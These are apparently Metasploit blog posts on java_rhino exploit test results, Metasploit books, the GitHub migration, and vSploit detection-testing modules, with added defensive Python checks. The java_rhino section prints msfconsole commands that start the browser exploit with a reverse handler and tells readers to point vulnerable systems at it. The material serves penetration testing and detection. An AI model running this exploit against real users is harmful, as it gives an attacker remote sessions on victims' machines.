
@_sinn3r and Juan Vazquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one. To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine whether you're running Java, you can use this link and click "Do I have Java?" below the big red 'Free Java Download' button.

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results. This vulnerability is particularly pernicious: it is cross-platform, unpatched on some systems, and an easy-to-exploit client-side vulnerability that does little to make users aware they're being exploited.

 

Microsoft Windows:

Both Windows XP and Windows 7 were tested. A session was generated in every browser tested when the system was running a Java version prior to the latest. Note that Chrome did prompt the user to let them know the Java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browser prompted the user.

WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Ubuntu Linux:

Several Linux desktops were tested, one with the Sun Java plugin and another with the IcedTea plugin. The IcedTea Java plugin did not appear to be vulnerable, though it wasn't tested extensively and may still be.

An attempt was made to update the Ubuntu 10.04 device: the Java package was downloaded and linked to the system Java. However, the plugin was not installed as part of this process, so even though the device was running the latest build (1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395.html - However, even after following these instructions, I was unable to get this process to work, and simply disabled Java on the vulnerable device.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not; however, when I went to disable the plugin, I noticed that the 'update' button led me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 11.10 x64 / Chrome (IcedTea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the IcedTea plugin

 

Apple OS X:

Interesting issue here: I was forced to update, restart, then update again to get the updated Sun Java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus a second update was required to get the latest Java package. To be fair, this system hadn't been updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.

OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Testing for the java_rhino vulnerability:

You can test this exploit in your own environment with the Metasploit Framework instructions below. We are currently prepping our weekly update for our commercial customers; it will be available in the Pro / Express / Community products later today.

msf  exploit(handler) > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > info
msf  exploit(java_rhino) > set URIPATH xxxx
msf  exploit(java_rhino) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.11:4444
[*] Using URL: hxxp://0.0.0.0:8080/xxxx
[*]  Local IP: hxxp://10.0.0.11:8080/xxxx
[*] Server started.

Point vulnerable systems at the URL, and wait for your sessions.
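As an added example (not code from the original post), here is a check a defender can run across an inventory before pointing hosts at the module: it parses the text `java -version` prints and flags any JRE older than the fixed 1.6.0_29 build. The sample outputs are constructed; the check compares version only, so it flags the IcedTea build conservatively, and, as the Ubuntu notes above show, a current system JRE does not guarantee the browser plugin is current.

```python
import re
from typing import NamedTuple, Optional, Tuple

# Patched release named in the post: Java 6 Update 29 (build 1.6.0_29-b11). Java 7 is not covered.
PATCHED = (1, 6, 0, 29)
VERSION_RE = re.compile(r'java version "(\d+)\.(\d+)\.(\d+)(?:_(\d+))?')
BUILD_RE = re.compile(r"\(build (\S+)\)")  # runtime build id, e.g. 1.6.0_26-b03


class JavaInfo(NamedTuple):
    version: Tuple[int, int, int, int]
    build: Optional[str]
    runtime: str  # "OpenJDK/IcedTea" or "Oracle/Sun"


def parse_java_version(output: str) -> Optional[JavaInfo]:
    """Parse the text `java -version` prints (on stderr); None if no version line."""
    m = VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, update = m.groups()
    version = (int(major), int(minor), int(patch), int(update or 0))
    b = BUILD_RE.search(output)
    runtime = "OpenJDK/IcedTea" if ("OpenJDK" in output or "IcedTea" in output) else "Oracle/Sun"
    return JavaInfo(version, b.group(1) if b else None, runtime)


def assess(output: str) -> str:
    """'vulnerable' if the JRE predates 1.6.0_29, 'patched' otherwise, 'no-java' if unparseable."""
    # Caveat from the post: this only sees the JRE on the PATH; the browser
    # plugin can still be an older build even when the system JRE is current.
    info = parse_java_version(output)
    if info is None:
        return "no-java"
    return "vulnerable" if info.version < PATCHED else "patched"


# Constructed samples in the format `java -version` uses (not captured from the post's test systems).
ORACLE_1_6_0_26 = ('java version "1.6.0_26"\n'
                   "Java(TM) SE Runtime Environment (build 1.6.0_26-b03)\n"
                   "Java HotSpot(TM) 64-Bit Server VM (build 20.1-b02, mixed mode)\n")
ORACLE_1_6_0_29 = ('java version "1.6.0_29"\n'
                   "Java(TM) SE Runtime Environment (build 1.6.0_29-b11)\n"
                   "Java HotSpot(TM) 64-Bit Server VM (build 20.4-b02, mixed mode)\n")
ICEDTEA_1_6_0_23 = ('java version "1.6.0_23"\n'
                    "OpenJDK Runtime Environment (IcedTea6 1.11pre) (6b23~pre11-0ubuntu1.11.10.2)\n"
                    "OpenJDK 64-Bit Server VM (build 20.0-b11, mixed mode)\n")
```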

I've seen three great Metasploit books published lately. The one that most people are probably already familiar with is Metasploit: The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns and Mati Aharoni. The book is very comprehensive, and packed full of great advice. David Kennedy is Chief Information Security Officer at Diebold Incorporated and creator of the Social-Engineer Toolkit (SET), Fast-Track, and other open source tools, so he really knows his stuff. By the way, Rapid7's HD Moore wrote the foreword for this book. (Get sample chapter and 30% discount code)

 

The other two books were both published in German, but I know that Metasploit has a huge following in Germany, so I want to include them as well. The first one is Penetration Testing mit Metasploit: Eine praktische Einführung by Frank Neugebauer. It's a perfect book if you're just getting started with Metasploit and need a good primer. Frank is working for the Computer Emergency Response Team der Bundeswehr (CERTBw) as an IT Security Specialist. (Get sample chapters)

 

There's also Metasploit: Das Handbuch zum Penetration-Testing-Framework by Michael Messner, a much more comprehensive book that is a great reference work for advanced Metasploit users. Mike works as a Senior IT Security Consultant for Integralis in Germany. He conducts security assessments, penetration tests, and gives trainings for Metasploit. I'd like to thank Mike for giving me the opportunity to write the foreword for this great book. (Get sample chapters)

 

In case you'd like to order your copy of these books, I've linked the covers to the Amazon order page.

 


At Metricon6 and later on his blog Cognitive Dissidents, Joshua Corman presented his latest discovery - HD Moore's Law:

 

"Casual Attacker power grows at the rate of Metasploit"

 

This is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure.

 

HD Moore created the Metasploit Project in 2003 to provide the security community with a public resource for exploit development. This project resulted in the Metasploit Framework, an open source platform for writing security tools and exploits.

 

The Metasploit Framework took away some of the "black magic" components of hacking, making it accessible to network admins and security professionals with "lesser powers" to run typical hacking attacks against their own network to see if the network is vulnerable. They could then use these findings to remediate any security issues they found. This is still true today.

 

At the same time, this commoditization of exploit tools made it easier for a casual attacker to exploit other people's networks, and this is where Joshua Corman's comment comes in: if you can breach your own network, then someone else can too. Because Metasploit is the industry's leading penetration testing tool with about 120,000 users, it is both the best way to test your network's security and also the most likely vector of attack.

 

Thanks Josh, for calling out this law, and for suggesting that people should test if they meet the "Metasploit minimum bar". If you'd like to test your own network, you can download a free copy of Metasploit here.


Git while the gitting is good

Posted by hdmoore Nov 10, 2011

The Metasploit Framework has grown in leaps and bounds: what used to be a small team of free-time developers is now an actual product team working for a real company. The community that contributes to the open source framework has continued to expand; instead of a few active contributors, we now have over a dozen, not counting all of the drive-by coders who submit patches and modules through the Redmine tracking system. As the code base grows, so does our user base, and quality has become the most important feature of the product.

 

The huge number of contributions on one hand, and the quality demands on the other, have led to a situation where our existing development process was starting to feel the strain. To keep up with the load, we have made major investments in our automated quality testing. Continuous integration tools, automated lab management APIs, and other changes to the code base have helped us keep up with the increasing size of the project. The development tools, however, were still significantly lacking.

 

I'll admit it. I used CVS and Bugzilla until 2005. I have been using Subversion and Trac/Redmine ever since. The latest and greatest in source code management tools has always seemed less interesting to me than the actual code I was working on - if the solution worked, there wasn't any strong reason to move away from it. We have finally reached the point where the centralized development model we have today makes it hard for folks outside the project to contribute easily. Even folks who have direct commit access could use a better branching model and testing process before pushing their changes back into the development trunk.

 

All development on the Metasploit Framework (along with warvox, msfrpc-client, and nexpose-client) is now managed through the Git SCM and the GitHub.com development portal. This is a major change for a few reasons:

 

  • Anyone can fork the official repository, modify the code, and send a pull request. All existing developers will use this exact model. This makes contributing a module and getting peer review nearly painless.

  • Anyone can fork the official repository, add their own code to this fork, and make this available to other Metasploit Framework users. GitHub provides both Git and Subversion access to all hosted repositories, including forks like this. Switching to an experimental branch takes three commands:

# cd /opt/metasploit-4.1.4
# mv msf3 msf3.official
# svn co https://svn.github.com/<YOUR NAME>/metasploit-framework.git msf3

  • All merges to the official repository are signed off by a Rapid7 employee. This may seem restrictive, but the goal is to increase accountability and prevent dumb bugs from making their way into the code base. This code review happens today, but bugs can still slip past when a developer merges an external patch without adequate review. Git's branching model and pull request system will make this process painless and transparent. This overhead is balanced by the fact that any developer can publish their personal fork while their changes go through code review.

 

This changes the development process, but keeps the existing Subversion update mechanism, along with msfupdate and other svn-based tools working as-is. This was accomplished through a pile of custom code currently named "Charon"; merges to the master branch in GitHub are replicated to our existing Subversion repository, which is mirrored through the standard https://metasploit.com/svn/framework3/trunk/ URL. If you use Subversion today to keep updated, keep using it. This architecture lets us introduce additional quality checks between merges to Git and their replication to the Subversion trunk and will not be going away anytime soon.

 

A huge thanks to Matt Buck and Trevor Rosen who gave up any pretense of a work-life balance for the last week to make this happen. This is one of many changes coming to the project to expand opportunities for collaboration while continuing to raise the quality bar.

 

-HD

Many security researchers use the Metasploit Framework for security proofs of concept and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit's Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone's file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple's code signing requirements, which in turn allowed him to run arbitrary code on the iPhone.

 

 

I created a couple of new vSploit modules to allow organizations to test their abilities for APT-type activity detection. There are already a few vSploit modules in the Metasploit trunk and you should see several more modules added next year. I will keep coding vSploit modules in my spare time to fill critical needs when I see them. I have created a new DNS beaconing module and filestream module and posted them to my GitHub account (links below).

 

DNS_Red

There have been two really good sources of information recently on malicious domain names. If you didn't get a chance to check the following two links out, they are must reads:

http://www.secureworks.com/research/threats/htran/

http://pastebin.com/yKSQd5Z5

 

I grabbed all of the domains, sorted, and eliminated duplicates and threw them into a vSploit module.

This module is available for download at my GitHub account: https://github.com/threatagent/vSploit/blob/master/vSploit/dns_red.rb

 

I believe it is essential that organizations, especially DoD and .gov agencies, are able to detect suspicious domains like the following. The process is simple: 1) Run the vSploit module. 2) Is your DNS logging/monitoring picking up this activity?

 

If you can't see the activity you need to put something in place to make that happen.
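An added example, not part of the vSploit code, of the logging side of that check: it reads BIND-style query log lines and matches them against a domain list, treating subdomains of a listed domain as hits while not matching look-alike names such as notevil-c2.example. The blocklist and log lines are constructed placeholders, not the domains the module resolves.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Constructed stand-in blocklist. The dns_red module carries the real domains
# from the two linked sources; none of them are reproduced here.
BLOCKLIST = {"evil-c2.example", "beacon.example.net"}

# Matches a BIND "queries" category log line such as:
#   07-Oct-2011 17:43:02.002 client 10.0.0.5#53212: query: evil-c2.example IN A + (10.0.0.1)
QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def normalize(name: str) -> str:
    """Lower-case and drop the trailing dot of an absolute name."""
    return name.rstrip(".").lower()


def match_blocklist(qname: str, blocklist=BLOCKLIST) -> Optional[str]:
    """Return the listed domain that qname equals or is a subdomain of, else None."""
    # A plain substring test would also flag 'notevil-c2.example' and
    # 'evil-c2.example.com'; the label-boundary check below does not.
    name = normalize(qname)
    for listed in blocklist:
        listed = normalize(listed)
        if name == listed or name.endswith("." + listed):
            return listed
    return None


def find_hits(lines: Iterable[str], blocklist=BLOCKLIST) -> List[Tuple[str, str, str]]:
    """(client, queried name, listed domain) for every query that hits the list."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        listed = match_blocklist(m.group("qname"), blocklist)
        if listed:
            hits.append((m.group("src"), normalize(m.group("qname")), listed))
    return hits


# Constructed log lines in BIND query-log style (not a real capture).
SAMPLE_LOG = [
    "07-Oct-2011 17:43:01.001 client 10.0.0.5#53211: query: www.metasploit.com IN A + (10.0.0.1)",
    "07-Oct-2011 17:43:02.002 client 10.0.0.5#53212: query: evil-c2.example IN A + (10.0.0.1)",
    "07-Oct-2011 17:43:03.003 client 10.0.0.7#40001: query: cdn.beacon.example.net. IN TXT + (10.0.0.1)",
    "07-Oct-2011 17:43:04.004 client 10.0.0.9#40002: query: notevil-c2.example IN A + (10.0.0.1)",
    "07-Oct-2011 17:43:05.005 client 10.0.0.9#40003: query: evil-c2.example.com IN A + (10.0.0.1)",
]
```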


vSploit filestream

 

If you are familiar with what's going on with current attacks, you may know that attackers tend to compress files (e.g. into encrypted RAR archives) and exfiltrate them. Many times attackers are able to send these in plain text over networks without detection. I don't know too many places, especially government related, that run RAR software on their network. I could be totally wrong on that point, but I haven't seen it. The filestream module sends data streams that emulate malicious files by sending a matching file header followed by hex padding.

 

The module currently sends filestreams emulating EXE (Windows Executables), ZIP (ZIP Archives), RAR (RAR Archives), and ELF (Linux/UNIX Executables). This module works with TCP/UDP and requires a listener port. Although the filetypes may be common in some environments, there are definitely cases where they shouldn't be traversing networks. Regardless, organizations should be able to see this activity.
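An added example (not the module's own code) of what a detector on the receiving side would check: classify a payload by its leading magic bytes for the four types above, and for EXE distinguish a bare MZ stub from a real PE image via the e_lfanew pointer. The sample payloads are constructed: a signature plus zero padding, the shape the post describes, alongside a benign HTTP request and a minimal PE header.

```python
import struct
from typing import Dict, Optional

# Standard magic numbers for the four types the filestream module emulates.
# (These are the public file-format signatures, not bytes taken from the module.)
SIGNATURES = [
    (b"Rar!\x1a\x07\x00", "RAR"),  # RAR 1.5 - 4.x archive marker block
    (b"PK\x03\x04", "ZIP"),        # ZIP local file header
    (b"\x7fELF", "ELF"),           # ELF executable
    (b"MZ", "EXE"),                # DOS/PE stub; only two bytes, so prone to false positives
]


def classify_stream(data: bytes) -> Optional[str]:
    """File type implied by the first bytes of a payload, or None."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return None


def has_pe_header(data: bytes) -> bool:
    """Stricter EXE test: e_lfanew (offset 0x3c) must point at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3c)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def alert(data: bytes) -> Optional[str]:
    """Label a payload; distinguishes a bare MZ stub from a real PE image."""
    kind = classify_stream(data)
    if kind == "EXE" and not has_pe_header(data):
        return "EXE (MZ stub only, no PE header)"
    return kind


def scan(streams: Dict[str, bytes]) -> Dict[str, Optional[str]]:
    return {name: alert(data) for name, data in streams.items()}


# Constructed payloads: signature plus zero padding (the shape the post describes),
# a benign HTTP request, and a minimal PE header whose e_lfanew points at 0x40.
PE_STUB = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
SAMPLE_STREAMS = {
    "rar_flow": b"Rar!\x1a\x07\x00" + b"\x00" * 60,
    "zip_flow": b"PK\x03\x04" + b"\x00" * 60,
    "elf_flow": b"\x7fELF" + b"\x00" * 60,
    "exe_flow": b"MZ" + b"\x00" * 62,
    "pe_flow": PE_STUB,
    "http_flow": b"GET / HTTP/1.1\r\nHost: www.metasploit.com\r\n\r\n",
}
```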

 

GitHub link: https://github.com/threatagent/vSploit/blob/master/vSploit/vsploit_filestream.rb

Module output and Wireshark capture of the RAR filestream (screenshots not reproduced).

 

These modules can definitely help some environments. As always, I'd love your feedback. Please leave a comment below.

I often hear from technical IT folks that communicating the benefit of a penetration test is difficult, especially to a business audience. "You want me to authorize you to break into my systems?" they ask.

 

We are all afraid of things we don't understand. This is why you should first make your management comfortable with the concept of penetration testing. Why don't you try this example: We should all visit our doctor for regular medical check-ups, even when we feel healthy. This is the only way to recognize and treat grave illnesses early. Such an exam should be obvious to every responsible adult who wants to protect his family and himself in the long-term.

 

Likewise, penetration testing should also be conducted regularly on important systems so we can detect where our systems are vulnerable. We have to find these vulnerabilities before criminals, spies, and cyber punks can harm our enterprise. Penetration tests are one of the tools for responsible IT management to identify and mitigate risks. As with a health check, you should entrust this to trained experts: medical doctors and penetration testers.

 

Have you found a different way of explaining penetration testing to your business audience? Please share your experience of what works and what doesn't with your peers by posting a comment below.

 

If you enjoyed this post, you may also like the white paper "How to Justify Your Security Assessment Budget".
